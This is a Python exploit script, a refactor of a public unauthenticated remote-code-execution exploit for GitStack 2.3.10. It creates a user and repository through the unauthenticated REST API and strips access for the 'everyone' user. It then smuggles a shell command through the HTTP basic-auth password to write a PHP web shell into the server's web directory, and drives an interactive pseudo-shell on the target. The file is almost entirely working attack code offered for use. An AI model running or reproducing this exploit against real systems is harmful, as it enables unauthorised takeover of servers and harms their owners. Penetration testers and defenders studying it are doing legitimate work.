exploit_refactored.py

#!/usr/bin/python3
# Refactor of GitStack 2.3.10 Unauthenticated Remote Code Execution exploit script
# Exploit: GitStack 2.3.10 Unauthenticated Remote Code Execution
# Date: 18.01.2018
# Software Link: https://gitstack.com/
# Original Exploit Author: Kacper Szurek
# Original Exploit Link: https://www.exploit-db.com/exploits/43777
# Refactor Author: Timothy Bernard
# Category: remote


import argparse, requests, sys, signal, ssl, random, string, os, socket
from requests.auth import HTTPBasicAuth
from prompt_toolkit import prompt
from urllib3.exceptions import InsecureRequestWarning


csrf_token = 'token' 

user_list = []

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

class colours():
	red = "\033[91m"
	green = "\033[92m"
	blue = "\033[34m"
	orange = "\033[33m"
	purple = "\033[35m"
	end = "\033[0m"

def sigHandler(sig, frame):
	print(f"{colours.blue}\n[*] Exiting....{colours.end}\n")
	sys.exit(0);

class Exploit():
	def __init__(self):
		self.session = requests.Session()
		self.session.verify = False
	
	def fail(self, reason, die=True):
		if not self.args.accessible:
			print(f"{colours.red}[-] {reason}{colours.end}")
		else:
			print(f"Failure: {reason}")
		if die:
			sys.exit(0)
	def success(self, text):
		if not self.args.accessible:
			print(f"{colours.green}[+] {text}{colours.end}")
		else:
			print(f"Success: {text}")

	def warn(self, text):
		if not self.args.accessible:
			print(f"{colours.orange}[*] {text}{colours.end}")
		else:
			print(f"Warning: {text}")

	def info(self, text):
		if not self.args.accessible:
			print(f"{colours.blue}[*] {text}{colours.end}")
		else:
			print(f"Info: {text}")
		
	#Argument Parsing
	def parseArgs(self):
		parser = argparse.ArgumentParser(description="Refactored exploit code for GitStack 2.3.10 RCE")
		parser.add_argument("target", help="Target IP or hostname")
		parser.add_argument("-b", "--basedir", help="The base directory of webmin (default: /)", default="/")
		parser.add_argument("-s", "--ssl", help="Specify to use SSL", default="http://",  const="https://", action="store_const")
		parser.add_argument("-p", "--port", type=int, default=80, help="Port for Gitstack. Default is 80.")
		parser.add_argument("-U", "--user", default="rce", type=str, help="User to create. Default is 'rce'")
		parser.add_argument("-P", "--password", default="rce", type=str, help="Password for user. Default is 'rce'")
		parser.add_argument("-r", "--repo", default="rce", type=str, help="Repository to create for exploit. Default is 'rce'")
		parser.add_argument("--force", default=False, action="store_true", help="Force exploitation with no checks or repository creation")
		parser.add_argument("--accessible", default=False, action="store_true", help="Remove ascii art")
		args = parser.parse_args()

		args.basedir = f"/{args.basedir}" if (args.basedir[0] != "/") else f"{args.basedir}"
		if args.port not in range(1,65535):
			self.fail(f"Invalid Port: {args.port}")
		self.args = args

	def checkConnect(self):
		target = f"{self.args.ssl}{self.args.target}:{self.args.port}{self.args.basedir}"
		try:
			r = self.session.get(target, timeout=5) 
		except requests.exceptions.SSLError:
			self.info("Server is running without SSL. Switching to HTTP")
			self.args.ssl = "http://"
			self.checkConnect()
			return
		except:
			self.fail(f"Failed to connect to {target}")
		if " SSL " in r.content.decode().upper():
			self.info("Server is running in SSL mode. Switching to HTTPS")
			self.args.ssl = "https://"
			self.checkConnect()
			return
		self.success(f"Connected to {target} successfully.")

	
	#Create user
	def createUsers(self):
		target = f"{self.args.ssl}{self.args.target}:{self.args.port}{self.args.basedir}"
		self.info(f"Creating users on {target}.")

		try:
			r = self.session.get("{}rest/user/".format(target), timeout=5)
			user_list = r.json()
			user_list.remove('everyone')
		except:
			pass

		if len(user_list) > 0:
			self.username = user_list[0]
			self.info(f"Found user {self.username}")
		else:
			self.info(f"Creating users {self.args.user} with password {self.args.password}")
			r = self.session.post("{}/rest/user/".format(target), data={'username' : self.args.user, 'password' : self.args.password})
			
			if not "User created" in r.text and not "User already exist" in r.text:
				self.fail(f"Cannot create users.")
				os._exit(0)
			self.username = self.args.user
				
	#Enable web access if disabled
	def enableWeb(self):
		target = f"{self.args.ssl}{self.args.target}:{self.args.port}{self.args.basedir}"
		r = self.session.get("{}rest/settings/general/webinterface/".format(target))
		if "true" in r.text:
			self.info(f"Web repository already created")
		else:
			self.info(f"Enabling web interface")
			r = self.session.put("{}rest/settings/general/webinterface/".format(target), data='{"enabled" : "true"}')
			if not "Web interface successfully enabled" in r.text:
				self.fail(f"Cannot enable web interface")
				os._exit(0)

	#Create repository and attempt to add user. Disable access for the everyone user.			
	def createRepo(self):
		self.info(f"Getting repository list")
		target = f"{self.args.ssl}{self.args.target}:{self.args.port}{self.args.basedir}"
		r = self.session.get("{}rest/repository/".format(target))
		repository_list = r.json()

		if len(repository_list) > 0:
			repository = repository_list[0]['name']
			self.info(f"Found repo: {repository}")
		else:
			self.info(f"Creating repository")
			repository = self.args.repo
			r = self.session.post("{}rest/repository/".format(target), cookies={'csrftoken' : csrf_token}, data={'name' : repository, 'csrfmiddlewaretoken' : csrf_token})
			if not "The repository has been successfully created" in r.text and not "Repository already exist" in r.text:
				self.fail(f"Cannot create repository")
				os._exit(0)

		self.info(f"Adding user {self.username} to repository")
		r = self.session.post("{}rest/repository/{}/user/{}/".format(target, repository, self.username))

		if not "added to" in r.text and not "has already" in r.text:
			self.fail(f"Cannot add user to repository")
			os._exit(0)	

		self.info("Disabling everyone user access to repository")
		r = self.session.delete("{}rest/repository/{}/user/{}/".format(target, repository, "everyone"))

		if not "everyone removed from rce" in r.text and not "not in list" in r.text:
			self.fail(f"Cannot remove everyone from repository")
			os._exit(0)	
		
		r = self.session.get('{}web/index.php?p={}.git&a=summary'.format(target, repository), auth=HTTPBasicAuth(self.username, 'p && echo "<?php system($_POST[\'a\']); ?>" > c:\GitStack\gitphp\exploit-n0m4d.php'))
		print(r.text.encode(sys.stdout.encoding, errors='replace'))

	def runChecks(self):
		self.checkConnect()
		self.createUsers()
		self.enableWeb()
		self.createRepo()
	

	#Run command against target. Create exploit file in web directory. Then run command with that file and parameter on target.
	def exploitRCE(self, command):
		target = f"{self.args.ssl}{self.args.target}:{self.args.port}{self.args.basedir}"
		r = self.session.post("{}web/exploit-n0m4d.php".format(target), data={'a' : command})
		return(r.text.encode(sys.stdout.encoding, errors='replace'))
	
	def pseudoShell(self):
		print()
		if not self.args.force:
			self.success("The target is vulnerable and a pseudoshell has been obtained.\n"
						"Type commands to have them executed on the target.")
			self.info("Type 'exit' to exit.")
		else:
			self.warn("Warning: No checks have been carried out -- proceed with caution!")
		print()
		while True:
			try:
				command = prompt("> ")
			except KeyboardInterrupt:
				self.info("Exiting...\n")
				sys.exit(0)		
			if command.lower() == "quit" or command.lower() == "exit":
				self.info("Exiting...\n")
				sys.exit(0)
			elif len(command) == 0:
				continue

			results = self.exploitRCE(command=command)
			print(results.decode())


if __name__ == "__main__":
	signal.signal(signal.SIGINT, sigHandler)
	exploit = Exploit()
	exploit.parseArgs()
	if not exploit.args.force:
		exploit.runChecks()
	exploit.pseudoShell()